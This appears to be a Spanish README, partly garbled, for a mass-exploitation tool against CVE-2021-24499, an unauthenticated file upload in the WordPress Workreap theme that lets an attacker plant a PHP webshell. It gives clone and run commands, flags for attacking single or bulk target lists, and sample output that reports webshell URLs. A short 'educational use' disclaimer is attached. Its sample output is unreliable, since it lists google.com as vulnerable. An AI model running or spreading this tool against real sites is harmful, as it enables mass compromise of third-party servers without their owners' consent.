
WordPress Theme Workreap 2.2.2 - Carga no autenticada que lleva a Ejecución Remota de Código
Tema de WordPress Workreap 2.2.2 - Subida de Archivos No Autenticada que Conduce a Ejecución Remota de Código
Una herramienta de explotación masiva potente y precisa para la vulnerabilidad CVE-2021-24499 en el tema Workreap de WordPress. Este exploit permite la subida de archivos no autenticada que puede conducir a la Ejecución Remota de Código (RCE).
CVE-2021-24499 es una vulnerabilidad crítica en el tema Workreap de WordPress (versión 2.2.2 y anteriores) que permite a usuarios no autenticados subir archivos arbitrarios, incluyendo archivos PHP, a través de la acción AJAX workreap_award_temp_file_uploader. Esto puede conducir a la Ejecución Remota de Código (RCE) en el servidor objetivo.
Versiones Vulnerables: Todas las versiones hasta 2.2.2 inclusive
Puntuación CVSS: Crítica
curlopts.php o shell.php (webshell PHP)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php o shell.php en el mismo directorio (tu webshell PHP)Objetivo Único:
./exploit.sh -u http://target.com
Múltiples Objetivos (desde archivo):
./exploit.sh -l targets.txt
Mostrar Ayuda:
./exploit.sh --help
| Option | Description |
|---|---|
-u URL | Explotar un único objetivo URL |
-l ARCHIVO | Explotar múltiples objetivos desde un archivo (una URL por línea) |
--help | Mostrar menú de ayuda |
Crea un archivo de texto con una URL por línea:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.
Al utilizar esta herramienta, aceptas usarla solo con fines legítimos de pruebas de seguridad e investigación.
Autor: Jay Maranatha Hutajulu
Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.
¡Las contribuciones, problemas y solicitudes de características son bienvenidos! No dudes en consultar la página de issues.
Si encuentras útil esta herramienta, por favor considera darle una estrella ⭐
Recuerda: Siempre usa las herramientas de seguridad de manera responsable y ética. ¡Feliz hacking! 🚀